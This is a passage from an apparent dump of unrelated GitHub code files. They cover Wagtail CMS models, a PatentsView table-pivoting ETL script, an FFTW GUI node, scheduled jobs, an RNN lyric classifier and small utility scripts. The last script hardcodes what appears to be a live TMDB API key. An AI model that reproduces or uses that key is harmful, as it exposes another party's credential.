FieldPanel('address_1'),\n FieldPanel('address_2'),\n FieldPanel('city'),\n FieldPanel('country'),\n FieldPanel('post_code'),\n ]\n\n class Meta:\n abstract = True\n\n\n# Carousel items\n\nclass CarouselItem(LinkFields):\n image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n embed_url = models.URLField(\"Embed URL\", blank=True)\n caption = models.CharField(max_length=255, blank=True)\n\n panels = [\n ImageChooserPanel('image'),\n FieldPanel('embed_url'),\n FieldPanel('caption'),\n MultiFieldPanel(LinkFields.panels, \"Link\"),\n ]\n\n class Meta:\n abstract = True\n\n\n# Related links\n\nclass RelatedLink(LinkFields):\n title = models.CharField(max_length=255, help_text=\"Link title\")\n\n panels = [\n FieldPanel('title'),\n MultiFieldPanel(LinkFields.panels, \"Link\"),\n ]\n\n class Meta:\n abstract = True\n\n\n# Advert Snippet\n\nclass AdvertPlacement(models.Model):\n page = ParentalKey('wagtailcore.Page', related_name='advert_placements')\n advert = models.ForeignKey('ethagaval.Advert', related_name='+')\n\n\nclass Advert(models.Model):\n page = models.ForeignKey(\n 'wagtailcore.Page',\n related_name='adverts',\n null=True,\n blank=True\n )\n url = models.URLField(null=True, blank=True)\n text = models.CharField(max_length=255)\n\n panels = [\n PageChooserPanel('page'),\n FieldPanel('url'),\n FieldPanel('text'),\n ]\n\n def __unicode__(self):\n return self.text\n\nregister_snippet(Advert)\n\n\n# Home Page\n\nclass HomePageCarouselItem(Orderable, CarouselItem):\n page = ParentalKey('ethagaval.HomePage', related_name='carousel_items')\n\n\nclass HomePageRelatedLink(Orderable, RelatedLink):\n page = ParentalKey('ethagaval.HomePage', related_name='related_links')\n\n\nclass HomePage(Page):\n body = RichTextField(blank=True)\n\n search_fields = Page.search_fields + (\n index.SearchField('body'),\n )\n\n class Meta:\n verbose_name = \"Homepage\"\n\nHomePage.content_panels = [\n FieldPanel('title', classname=\"full title\"),\n FieldPanel('body', classname=\"full\"),\n InlinePanel(HomePage, 'carousel_items', label=\"Carousel items\"),\n InlinePanel(HomePage, 'related_links', label=\"Related links\"),\n]\n\nHomePage.promote_panels = Page.promote_panels\n\n\n# Contact page\n\nclass ContactPage(Page, ContactFields):\n body = RichTextField(blank=True)\n feed_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n search_fields = Page.search_fields + (\n index.SearchField('body'),\n )\n\nContactPage.content_panels = [\n FieldPanel('title', classname=\"full title\"),\n FieldPanel('body', classname=\"full\"),\n MultiFieldPanel(ContactFields.panels, \"Contact\"),\n]\n\nContactPage.promote_panels = Page.promote_panels + [\n ImageChooserPanel('feed_image'),\n]\n\n#Resource Index\n\nclass ResourceIndexPageRelatedLink(Orderable, RelatedLink):\n page = ParentalKey('ethagaval.ResourceIndexPage', related_name='related_links')\n\n\nclass ResourceIndexPage(Page):\n description = RichTextField(blank=True)\n\n search_fields = Page.search_fields + (\n index.SearchField('description'),\n )\n\n @property\n def resources(self):\n # Get list of live event pages that are descendants of this page\n resources = ResourcePage.objects.live().descendant_of(self)\n\n # Filter resources list to get ones that are either\n # running now or start in the future\n # resources = resources.filter(date_from__gte=date.today())\n\n # Order by date\n resources = resources.order_by('date_from')\n\n return resources\n\nResourceIndexPage.content_panels = [\n FieldPanel('title', classname=\"full title\"),\n FieldPanel('description', classname=\"full\"),\n InlinePanel(ResourceIndexPage, 'related_links', label=\"Related links\"),\n]\n\nResourceIndexPage.promote_panels = Page.promote_panels\n\n\nclass ResourcePageCarouselItem(Orderable, CarouselItem):\n page = ParentalKey('ethagaval.ResourcePage', related_name='carousel_items')\n\n\nclass ResourcePageRelatedLink(Orderable, RelatedLink):\n page = ParentalKey('ethagaval.ResourcePage', related_name='related_links')\n\n\nclass ResourcePageOwner(Orderable, LinkFields):\n page = ParentalKey('ethagaval.ResourcePage', related_name='owners')\n first_name = models.CharField(\"Name\", max_length=255, blank=True)\n last_name = models.CharField(\"Surname\", max_length=255, blank=True)\n image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n @property\n def name_display(self):\n return self.first_name + \" \" + self.last_name\n\n panels = [\n FieldPanel('first_name'),\n FieldPanel('last_name'),\n ImageChooserPanel('image'),\n MultiFieldPanel(LinkFields.panels, \"Link\"),\n ]\n\n\nclass ResourcePage(Page):\n name = models.CharField(max_length=255)\n date_from = models.DateField(\"Start date\")\n time_from = models.TimeField(\"Start time\", null=True, blank=True)\n time_to = models.TimeField(\"End time\", null=True, blank=True)\n location = models.CharField(max_length=255)\n description = RichTextField(blank=True)\n feed_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n search_fields = Page.search_fields + (\n index.SearchField('location'),\n index.SearchField('description'),\n index.SearchField('name'),\n )\n\n @property\n def resource_index(self):\n # Find closest ancestor which is an event index\n return self.get_ancestors().type(ResourceIndexPage).last()\n\n def serve(self, request):\n if \"format\" in request.GET:\n if request.GET['format'] == 'ical':\n # Export to ical format\n response = HttpResponse(\n export_event(self, 'ical'),\n content_type='text/calendar',\n )\n response['Content-Disposition'] = 'attachment; filename=' + self.slug + '.ics'\n return response\n else:\n # Unrecognised format error\n message = 'Could not export event\\n\\nUnrecognised format: ' + request.GET['format']\n return HttpResponse(message, content_type='text/plain')\n else:\n # Display event page as usual\n return super(ResourcePage, self).serve(request)\n\nResourcePage.content_panels = [\n FieldPanel('title', classname=\"full title\"),\n FieldPanel('name'),\n FieldPanel('date_from'),\n FieldPanel('time_from'),\n FieldPanel('time_to'),\n FieldPanel('location'),\n InlinePanel(ResourcePage, 'carousel_items', label=\"Carousel items\"),\n FieldPanel('description', classname=\"full\"),\n InlinePanel(ResourcePage, 'owners', label=\"Owners\"),\n InlinePanel(ResourcePage, 'related_links', label=\"Related links\"),\n]\n\nResourcePage.promote_panels = Page.promote_panels + [\n ImageChooserPanel('feed_image'),\n]\n\nclass FormField(AbstractFormField):\n page = ParentalKey('FormPage', related_name='form_fields')\n\nclass FormPage(AbstractEmailForm):\n intro = RichTextField(blank=True)\n thank_you_text = RichTextField(blank=True)\n\nFormPage.content_panels = [\n FieldPanel('title', classname=\"full title\"),\n FieldPanel('intro', classname=\"full\"),\n InlinePanel(FormPage, 'form_fields', label=\"Form fields\"),\n FieldPanel('thank_you_text', classname=\"full\"),\n MultiFieldPanel([\n FieldPanel('to_address', classname=\"full\"),\n FieldPanel('from_address', classname=\"full\"),\n FieldPanel('subject', classname=\"full\"),\n ], \"Email\")\n]\n","repo_name":"arvindram03/e-thagaval","sub_path":"ethagaval/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9010993352","text":"import time\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\nfrom lib.configuration import get_connection_string\n\n\n#########################################################################################################\n# WIDE TABLE CREATION BELOW\n#########################################################################################################\n# REQUIRES: db_con, old_db, new_db, entity, raw entity table name, total rows in raw entity table, new_db timestamp\n# MODIFIES: nothing\n# EFFECTS: returns list of wide persistent entity columns\ndef get_wide_entity_disambig_cols(db_con, old_db, persistent_disambig_table):\n result = db_con.execute(\n \"select column_name from information_schema.columns where table_schema = '{0}' and table_name = '{1}';\".format(\n old_db, persistent_disambig_table))\n result_cols = [r[0] for r in result]\n disambig_cols = [x for x in result_cols if x.startswith('disamb')]\n disambig_cols.sort()\n print(disambig_cols)\n\n return disambig_cols\n\n\n# REQUIRES: db_con, old_db, new_db, entity, raw entity table name, total rows in raw entity table, new_db timestamp\n# MODIFIES: nothing\n# EFFECTS: writes .tsv of table in wide format\ndef write_wide_outfile(db_con, new_db, old_db, entity, persistent_long_table, raw_table, id_col, total_rows, outfile_fp,\n header_df):\n # fixed\n current_rawentity = 'current_raw{0}_id'.format(entity)\n old_rawentity = 'old_raw{0}_id'.format(entity)\n disamb_str = 'disamb_{}_id_'.format(entity)\n\n # fixed\n chunk_cols = [current_rawentity, old_rawentity, 'database_update', id_col]\n\n ############ 2. Convert long -> wide and output .tsv: grab all uuid rows together for a set of uuids\n limit = 300000\n offset = 0\n\n start = time.time()\n itr = 0\n\n print('Estimated # of rounds: ', total_rows / 300000)\n\n while True:\n\n print('###########################################\\n')\n\n print('Next iteration... ', itr)\n\n sql_stmt_inner = \"(select uuid from {0}.{1} order by uuid limit {2} offset {3}) raw\".format(new_db, raw_table,\n limit, offset)\n sql_stmt_template = \"select lf.uuid as {0}, raw_old.uuid as {1}, lf.database_update, lf.{2} from {3} left join {4}.{5} lf on raw.uuid = lf.uuid left join {5}.{6} raw_old on lf.uuid = raw_old.uuid;\".format(\n current_rawentity, old_rawentity, id_col, sql_stmt_inner, new_db, persistent_long_table, old_db, raw_table)\n\n print(sql_stmt_template)\n result = db_con.execute(sql_stmt_template)\n\n chunk_results = [r for r in result]\n\n # no more result batches to process! done\n if len(chunk_results) == 0:\n break\n\n # 0. Preprocess dataupdate column to add prefix + save current/old uuid lookup\n chunk_df = pd.DataFrame(chunk_results, columns=chunk_cols)\n chunk_df['database_update'] = disamb_str + chunk_df['database_update']\n\n uuid_lookup = chunk_df[[current_rawentity, old_rawentity]].drop_duplicates()\n\n # 1. Pivot, reset index & get back uuid as column, rename axis & remove database_update axis value\n pivoted_chunk_df = chunk_df.pivot(index=current_rawentity, columns='database_update',\n values=id_col).reset_index().rename_axis(None, 1)\n\n # 2. Merge back old rawinventor id column\n merged_df = pd.merge(pivoted_chunk_df, uuid_lookup)\n\n # 3. Concat with sort = False (preserves desired col order from header_df)\n formatted_chunk_df = pd.concat([header_df, merged_df], sort=False)\n\n # 4. Write to outfile\n formatted_chunk_df.to_csv(outfile_fp, index=False, header=False, mode='a', sep='\\t', na_rep=None)\n\n offset += limit\n itr += 1\n\n if itr == 1:\n print('Time for 1 iteration: ', time.time() - start, ' seconds')\n print('###########################################\\n')\n\n print('###########################################\\n')\n print('total time taken:', round(time.time() - start, 2), ' seconds')\n print('###########################################\\n')\n\n return\n\n\n# REQUIRES: db_con, entity, persistent entity table, outfile folder path\n# MODIFIES: nothing\n# EFFECTS: creates persistent entity table for new database\ndef create_wide_table_database(db_con, entity, persistent_disambig_table, outfile_fp):\n ####### 3. create table in database\n db_con.execute('drop table if exists {}.{}'.format(new_db, persistent_disambig_table))\n\n current_rawentity = 'current_raw{0}_id'.format(entity)\n\n # only read header for creating table\n wide_df = pd.read_csv(outfile_fp, sep='\\t', nrows=1)\n entity_db_cols = list(wide_df.columns.values)\n\n create_stmt = 'create table {0}.{1} ( '.format(new_db, persistent_disambig_table)\n primary_key_stmt = 'PRIMARY KEY (`{0}`));'.format(current_rawentity)\n\n create_stmt = get_create_syntax(db_con, entity, entity_db_cols, create_stmt)\n\n create_stmt = create_stmt + primary_key_stmt\n print(create_stmt)\n db_con.execute(create_stmt)\n\n return\n\n\ndef create_persistent_wide_entity(config, entity):\n db_con = create_engine(get_connection_string(config, 'NEW_DB')+'&local_infile=1')\n disambig_folder = \"{}/disambig_output/\".format(config['FOLDERS']['WORKING_FOLDER'])\n\n old_db = config['DATABASE']['OLD_DB']\n new_db = config['DATABASE']['NEW_DB']\n new_db_timestamp = new_db.replace('patent_', '')\n\n # set of values that change depending on entity\n persistent_long_table = 'persistent_{0}_disambig_long'.format(entity)\n raw_table = 'raw{0}'.format(entity)\n id_col = '{0}_id'.format(entity)\n\n outfile_name_wide = 'persistent_{}_wide.tsv'.format(entity)\n outfile_fp_wide = disambig_folder + outfile_name_wide\n\n persistent_disambig_table = 'persistent_{0}_disambig'.format(entity)\n\n # get disambig cols from old db's persistent_inventor_disambig\n disambig_cols = get_wide_entity_disambig_cols(db_con, old_db, persistent_disambig_table)\n\n # Add new column for this data update:\n raw_cols = ['current_{0}_id'.format(raw_table), 'old_{0}_id'.format(raw_table)]\n header_wide = [raw_cols[0], raw_cols[1]] + disambig_cols + ['disamb_{0}_id_'.format(entity) + new_db_timestamp]\n print(header_wide)\n header_df = pd.DataFrame(columns=header_wide)\n header_df.to_csv(outfile_fp_wide, index=False, header=True, sep='\\t')\n # get total rows in raw entity table\n result = db_con.execute('select count(*) from {0}.{1}'.format(new_db, raw_table))\n total_rows = [r[0] for r in result][0]\n write_wide_outfile(db_con, new_db, old_db, entity, persistent_long_table, raw_table, id_col, total_rows,\n outfile_fp_wide, header_df)\n\n ####### 3. create table in database\n create_wide_table_database(db_con, entity, persistent_disambig_table, outfile_fp_wide)\n\n ######### 4. load data\n db_con.execute(\n \"LOAD DATA LOCAL INFILE '{0}' INTO TABLE {1}.{2} FIELDS TERMINATED BY '\\t' NULL DEFINED BY '' IGNORE 1 lines;\".format(\n outfile_fp_wide, new_db, persistent_disambig_table))\n\n return True\n","repo_name":"PatentsView/PatentsView-DB","sub_path":"updater/post_processing/create_wide_persistent.py","file_name":"create_wide_persistent.py","file_ext":"py","file_size_in_byte":7196,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"67"} +{"seq_id":"1252113229","text":"import gpi\nimport numpy as np\nfrom gpi import QtWidgets\n\n\n# WIDGET\nclass FFTW_GROUP(gpi.GenericWidgetGroup):\n \"\"\"A combination of SpinBoxes, DoubleSpinBoxes, and PushButtons\n to form a unique widget suitable for FFT options on dimensions.\n \"\"\"\n valueChanged = gpi.Signal()\n\n def __init__(self, title, parent=None):\n super().__init__(title, parent)\n\n self._val = {}\n self._val['compute'] = False\n self._val['length'] = 1\n self._val['in_len'] = 1 # the original array length\n\n self.pb = gpi.BasicPushButton()\n self.pb.set_toggle(True)\n\n self.db = gpi.BasicDoubleSpinBox() # factor\n self.db.set_label('factor:')\n self.db.set_min(0.001)\n self.db.set_max(gpi.GPI_FLOAT_MAX)\n self.db.set_decimals(3)\n self.db.set_singlestep(0.001)\n self.db.set_val(1)\n\n self.sb = gpi.BasicSpinBox() # length\n self.sb.set_label('length:')\n self.sb.set_min(1)\n self.sb.set_val(1)\n self.sb.set_max(gpi.GPI_INT_MAX)\n\n self.db.valueChanged.connect(self.factChange)\n self.sb.valueChanged.connect(self.lenChange)\n self.pb.valueChanged.connect(self.compChange)\n\n vbox = QtWidgets.QHBoxLayout()\n vbox.addWidget(self.pb)\n vbox.addWidget(self.db)\n vbox.addWidget(self.sb)\n vbox.setStretch(0, 0)\n vbox.setStretch(1, 0)\n vbox.setStretch(2, 0)\n vbox.setContentsMargins(0, 0, 0, 0) # we don't need margins here\n vbox.setSpacing(0)\n self.setLayout(vbox)\n\n # setters\n def set_val(self, val):\n \"\"\"A python-dict containing: in_len, length, and compute parms. \"\"\"\n sig = False\n if 'in_len' in val:\n # otherwise this would change every time compute() was called\n if self._val['in_len'] != val['in_len']:\n self._val['in_len'] = val['in_len']\n fact = self.db.get_val() # set len based on factor\n fact *= self._val['in_len']\n self.setLenQuietly(int(fact))\n self._val['length'] = int(fact)\n if 'length' in val:\n self._val['length'] = val['length']\n self.setLenQuietly(val['length'])\n self.setFactQuietly(float(val[\n 'length'])/float(self._val['in_len']))\n sig = True\n if 'compute' in val:\n self._val['compute'] = val['compute']\n self.setCompQuietly(val['compute'])\n sig = True\n if sig:\n self.valueChanged.emit()\n\n def set_reset(self):\n \"\"\"An override that communicates with the embedded pushbutton. \"\"\"\n self.pb.set_reset()\n\n # getters\n def get_val(self):\n return self._val\n\n # support\n def factChange(self, val):\n self._val['length'] = int(self._val['in_len']*val)\n self.setLenQuietly(self._val['length'])\n self.valueChanged.emit()\n\n def lenChange(self, val):\n self._val['length'] = val\n self.setFactQuietly(float(val)/float(self._val['in_len']))\n self.valueChanged.emit()\n\n def compChange(self, val):\n self._val['compute'] = val\n self.valueChanged.emit()\n if val:\n self.pb.set_button_title('ON')\n else:\n self.pb.set_button_title('')\n\n def setFactQuietly(self, val):\n self.db.blockSignals(True)\n self.db.set_val(val)\n self.db.blockSignals(False)\n\n def setLenQuietly(self, val):\n self.sb.blockSignals(True)\n self.sb.set_val(val)\n self.sb.blockSignals(False)\n\n def setCompQuietly(self, val):\n self.pb.blockSignals(True)\n self.pb.set_val(val)\n self.pb.blockSignals(False)\n\n\nclass ExternalNode(gpi.NodeAPI):\n \"\"\"A module that implements the FFTW C++ package.\n Cropping and zero-padding only work on transformed dimensions.\n\n INPUT - data to be transformed, can be real or complex. DC is assumed to be at index N/2 (starting at 0)\n\n OUTPUT - transformed data, complex. DC is at index N/2 (starting at 0)\n\n WIDGETS:\n Dimension i - button turns off/on tranform in ith dimension\n factor and length are redundant parameters, length is the output dimension size\n factor = length/(input dimension size)\n factors < 1 result in cropping data before transformation\n factors > 1 result in zero-padding before transformation\n compute - compute\n direction - select whether you want a Forward or Inverse FFT\n \"\"\"\n\n def execType(self):\n # default executable type\n # return GPI_THREAD\n return gpi.GPI_PROCESS\n # return GPI_APPLOOP\n\n def initUI(self):\n\n # Widgets\n self.dim_base_name = 'Dimension['\n self.ndim = 10 # underlying c-code is only 10-dim\n for i in range(self.ndim):\n self.addWidget('FFTW_GROUP', self.dim_base_name+str(-i-1)+']')\n\n self.addWidget('PushButton', 'inverse', toggle=True)\n self.addWidget('PushButton', 'compute', toggle=True)\n\n # IO Ports\n self.addInPort('in', 'NPYarray', obligation=gpi.REQUIRED)\n self.addOutPort('out', 'NPYarray', dtype=np.complex64)\n\n def validate(self):\n '''update the widget bounds based on the input data\n '''\n\n # only update bounds if the 'in' port changed.\n if 'in' in self.portEvents():\n\n data = self.getData('in')\n\n # visibility and bounds\n for i in range(self.ndim):\n if i < len(data.shape):\n val = {'in_len': data.shape[-i-1]}\n self.setAttr(self.dim_base_name+str(-i-1)+']',\n visible=True, val=val)\n else:\n self.setAttr(self.dim_base_name+str(-i-1)+']',\n visible=False)\n\n # only change bounds if the 'direction' widget changed.\n if 'direction' in self.widgetEvents():\n direction = self.getVal('direction')\n if direction:\n self.setAttr('direction', button_title=\"INVERSE\")\n else:\n self.setAttr('direction', button_title=\"FORWARD\")\n\n return(0)\n\n def compute(self):\n\n data = self.getData('in')\n data = np.require(data, dtype=np.complex64, requirements='C')\n\n if self.getVal('compute'):\n\n # build the fft.fft argument list\n kwargs = {}\n\n # Direction | 0:FWD, 1:BKWD\n if self.getVal('inverse'):\n kwargs['dir'] = 1\n else:\n kwargs['dir'] = 0\n\n out_dims = np.array([], np.int64)\n\n # load up the dimension args\n for i in range(self.ndim):\n kwargs['dim'+str(i+1)] = 0\n val = self.getVal(self.dim_base_name+str(-i-1)+']')\n if i < len(data.shape):\n out_dims = np.append(out_dims, val['length'])\n if val['compute']:\n kwargs['dim'+str(i+1)] = 1\n\n\n # import in thread to save namespace\n import gpi_core.math.fft as ft\n\n out = ft.fftw(data, out_dims, **kwargs)\n\n self.setData('out', out)\n\n return(0)\n","repo_name":"gpilab/core-nodes","sub_path":"gpi_core/math/GPI/FFTW_GPI.py","file_name":"FFTW_GPI.py","file_ext":"py","file_size_in_byte":7299,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"67"} +{"seq_id":"21525755599","text":"from flask_apscheduler import APScheduler\nfrom apscheduler.events import (\n EVENT_JOB_EXECUTED,\n EVENT_JOB_ERROR,\n)\nfrom application.core.utils.logging_ import logging\nfrom .controls import (\n pull_ctr_check_process,\n push_trigger_schedule,\n push_cron_schedule,\n push_retention,\n push_close_ssh,\n)\n\nlogger = logging.getLogger(__name__)\n\n\ndef default_job(x, y) -> None:\n logger.info(f\"Default job start with args, {x}, and {y}\")\n\n\ndef schedule_check_process() -> None:\n \"\"\"Check process in `ctr_task_process` table and alert\n if exists 2 status longtime\n \"\"\"\n ps_false, ps_wait, ps_thread = pull_ctr_check_process()\n logger.info(\n f\"Check process false: {ps_false} \"\n f\"waiting: {ps_wait} thread: {ps_thread}\"\n )\n\n\ndef schedule_retention_data() -> None:\n \"\"\"\n Run retention module with schedule\n \"\"\"\n ps_time: int = push_retention()\n logger.info(f\"Success run retention data by schedule with {ps_time} sec.\")\n\n\ndef schedule_trigger() -> None:\n \"\"\"Run data pipeline trigger from data in `ctr_task_schedule`\n \"\"\"\n ps_time: int = push_trigger_schedule()\n logger.info(\n f\"End Schedule trigger for run data pipeline \"\n f\"with {ps_time} sec.\"\n )\n\n\ndef schedule_cron_every_sunday() -> None:\n \"\"\"Run data pipeline cron job every sunday at 00.05 AM\n \"\"\"\n ps_time: int = push_cron_schedule(group_name='every_sunday_at_00_05')\n logger.info(\n f\"End Schedule `every_sunday_at_00_05` for run data pipeline \"\n f\"with {ps_time} sec.\"\n )\n\n\ndef schedule_cron_everyday() -> None:\n \"\"\"\n Run data pipeline cron job everyday at 08.05 PM\n \"\"\"\n ps_time: int = push_cron_schedule(group_name='everyday_at_08_05')\n logger.info(\n f\"End Schedule `everyday_at_08_05` for run data pipeline \"\n f\"with {ps_time} sec.\"\n )\n\n\ndef schedule_cron_every_quarter() -> None:\n \"\"\"\n Run data pipeline cron job every quarter at 19th and 00.10 AM\n \"\"\"\n ps_time: int = push_cron_schedule(group_name='every_quarter_at_19th_00_10')\n logger.info(\n f\"End Schedule `every_quarter_at_19th_00_10` \"\n f\"for run data pipeline with {ps_time} sec.\"\n )\n\n\ndef schedule_close_ssh() -> None:\n \"\"\"Close SSH session\"\"\"\n import time\n time.sleep(10)\n push_close_ssh()\n\n\ndef listener_log(event):\n \"\"\"Listener\"\"\"\n if event.exception:\n logger.warning('The job crashed :(')\n else:\n logger.info('The job worked :)')\n\n\ndef add_schedules(scheduler: APScheduler):\n \"\"\"Add job schedules without decorator functions\"\"\"\n\n # scheduler.add_job(\n # 'retention_data',\n # schedule_retention_data,\n # trigger='cron',\n # day='1st sun',\n # jitter=600\n # )\n\n scheduler.add_job(\n id='check_process',\n func=schedule_check_process,\n trigger='cron',\n minute='*/10',\n jitter=10,\n misfire_grace_time=None,\n\n # Usage configuration\n max_instances=1,\n\n # Option for using job store\n jobstore='sqlite',\n replace_existing=True,\n )\n\n scheduler.add_job(\n id='trigger_schedule',\n func=schedule_trigger,\n trigger='interval',\n minutes=1,\n jitter=5,\n\n # Option for using job store\n jobstore='sqlite',\n replace_existing=True,\n )\n\n scheduler.add_job(\n id='cron_everyday',\n func=schedule_cron_everyday,\n trigger='cron',\n hour='20',\n minute='5',\n jitter=60,\n\n # Option for using job store\n jobstore='sqlite',\n replace_existing=True,\n )\n\n scheduler.add_job(\n id='cron_every_quarter',\n func=schedule_cron_every_quarter,\n trigger='cron',\n month='*/3',\n day='19',\n hour='0',\n minute='10',\n jitter=300,\n\n # Option for using job store\n jobstore='sqlite',\n replace_existing=True,\n )\n\n # scheduler.add_job(\n # id='close_ssh',\n # func=schedule_close_ssh,\n # trigger='cron',\n # minute='*/5',\n # jitter=10,\n # misfire_grace_time=None\n # )\n\n scheduler.add_listener(\n listener_log, EVENT_JOB_EXECUTED | EVENT_JOB_ERROR\n )\n return scheduler\n","repo_name":"korawica/dfa-flask-postgres","sub_path":"application/schedules.py","file_name":"schedules.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27353352774","text":"import torch\nimport string\nimport random\nimport math\nimport time\nimport matplotlib as plt\nfrom io import open\n\nplt.use('TkAgg')\n\nalphabet = string.ascii_letters\nn_letters = len(alphabet)\n\n\ndef groupSongs(filename):\n lines = open(filename, encoding='latin-1').read().strip().split('\\n')\n song_dict = {}\n for line in lines:\n line_list = line.split(',')\n # Throwaway label & get rid of unavailable lyrics\n if 'Year' not in str(line_list[3]) and line_list[4] not in [\" \", \"NA\", \"instrumental\"]:\n song_dict[line_list[4]] = line_list[3]\n return song_dict\n\n\ndef getLetterIndex(letter):\n return alphabet.find(letter)\n\n\ndef letterToTensor(letter):\n tensor = torch.zeros(1, n_letters)\n tensor[0][getLetterIndex(letter)] = 1\n return tensor\n\n\ndef lyricsToTensor(lyrics):\n tensor = torch.zeros(len(lyrics), 1, n_letters)\n for li, letter in enumerate(lyrics):\n tensor[li][0][getLetterIndex(letter)] = 1\n return tensor\n\n\ndef timeSince(since):\n now = time.time()\n s = now - since\n m = math.floor(s / 60)\n s -= m * 60\n return '%dm %ds' % (m, s)\n\n\ndef yearFromOutput(output):\n \"\"\" Formats the output to consist of just the predicted year. \"\"\"\n top_n, top_i = output.topk(1)\n category_i = top_i[0].item()\n return int(category_i) + 1965\n\n\ndef randomTrainingExample(song_dict):\n lyric, year = random.choice(list(song_dict.items()))\n year_tensor = torch.tensor([int(year) - 1965], dtype=torch.long)\n lyric_tensor = lyricsToTensor(lyric)\n return year, lyric, year_tensor, lyric_tensor\n\n\ndef trainRNN(category_tensor, line_tensor, rnn):\n hidden = rnn.initHidden()\n rnn.optimizer.zero_grad() # zero the parameter gradients\n #rnn.zero_grad()\n\n for i in range(line_tensor.size()[0]):\n output, hidden = rnn(line_tensor[i], hidden)\n\n loss = rnn.criterion(output, category_tensor)\n loss.backward()\n\n # clip gradient to address exploding gradient problem\n clip = 5\n torch.nn.utils.clip_grad_norm_(rnn.parameters(), clip)\n\n rnn.optimizer.step()\n\n\n # Add parameters' gradients to their values, multiplied by learning rate\n for p in rnn.parameters():\n p.data.add_(-rnn.learning_rate, p.grad.data)\n return output, loss.item()\n\n\ndef testRNN():\n pass\n\n\ndef plotAccuracy(xvals, yvals):\n plt.pyplot.plot(xvals, yvals)\n plt.pyplot.xlabel('Epoch')\n plt.pyplot.ylabel('Accuracy (% Correct Guesses)')\n plt.pyplot.savefig(\"../results/accuracy.png\")\n\ndef plotLoss(xvals, yvals):\n plt.pyplot.plot(xvals, yvals)\n plt.pyplot.xlabel('Epoch')\n plt.pyplot.ylabel('Loss')\n plt.pyplot.savefig(\"../results/losses.png\")","repo_name":"tem373/LyricLearn","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14789866412","text":"\"\"\"\r\nCalculate the average number of tosses needed to land a coin on both sides\r\n\"\"\"\r\n\r\nfrom random import randint\r\n\r\ntrials = 100000\r\nflips = 0\r\n\r\nfor trial in range(1, trials):\r\n flips += 1\r\n \r\n first_flip = randint(0, 1)\r\n\r\n # keep tossing until we get the different outcome\r\n while randint(0, 1) == first_flip:\r\n flips += 1\r\n flips += 1\r\n\r\nprint(\"The average number of tosses to land on both heads and tails is\", flips / trials)\r\n\r\n \r\n","repo_name":"nkspb/python-projects","sub_path":"coin_toss.py","file_name":"coin_toss.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"856979199","text":"#!/usr/bin/python\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\nimport sys, matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n# Force matplotlib to not use any Xwindows backend.\n\nsegment_duration = [float(i) for i in sys.argv[1].split(',')]\n\nmin_val = min(segment_duration)\nmax_val = max(segment_duration)\navg_val = sum(segment_duration)/len(segment_duration)\n\nindex = list(range(len(segment_duration)))\n\nplt.hist(segment_duration)\nplt.ylabel('Frequency')\nplt.xlabel('Duration (sec)')\nplt.title('Segment duration histogram')\n\n#Arrange for legend showing max, min and avg values of durations.\nmax, = plt.plot([], label='Max = '+str(format(max_val, '.2f'))+' sec')\nmin, = plt.plot([], label='Min = '+str(format(min_val, '.2f'))+' sec')\navg, = plt.plot([], label='Avg = '+str(format(avg_val, '.3f'))+' sec')\n\nif (sys.argv[2] == 'Not_Set'):\n\tduration, = plt.plot([], label='MPD duration = '+sys.argv[2])\nelse:\n\tduration, = plt.plot([], label='MPD duration = '+sys.argv[2]+' sec')\n#plt.legend(handles=[max, min, avg, duration], loc=0)\nplt.legend()\n\nplt.savefig(sys.argv[3])\n","repo_name":"Dash-Industry-Forum/HbbTV_DVB","sub_path":"seg_duration.py","file_name":"seg_duration.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12776603155","text":"import requests\nfrom pprint import pprint\n\n# 2. 특정 조건에 맞는 영화 출력\ndef vote_average_movies():\n # 0. 평점 8 이상인 영화 목록을 담는 리스트 초기화\n vote_average_movies_over_8 = []\n\n BASE_URL = 'https://api.themoviedb.org/3'\n path = '/movie/popular'\n params = {\n 'api_key': 'ea7605a7a7e59759ce6acfc9527a9e1a',\n 'language': 'ko-KR'\n}\n \n response = requests.get(BASE_URL+path, params=params).json()\n # 3. response의 'results'항목을 `movie_details`에 할당)\n movie_details = response.get('results',None)\n\n # 5. movie_details 반복\n for movie_detail in movie_details:\n # 6. 개별 영화들의 평점 확인\n vote_average = movie_detail.get('vote_average', None)\n # 7. 8점 이상인 경우 vote_average_movies_over_8에 해당 영화 정보를 담는다.\n if vote_average >= 8:\n vote_average_movies_over_8.append(movie_detail)\n\n # 8. 평점 8 이상인 영화들의 목록을 담은 리스트를 반환한다.\n return vote_average_movies_over_8\n\n\n\nif __name__ == '__main__':\n pprint(vote_average_movies()) ","repo_name":"ksy133900/TIL","sub_path":"Project/0722/01.인기 영화 조회.py","file_name":"01.인기 영화 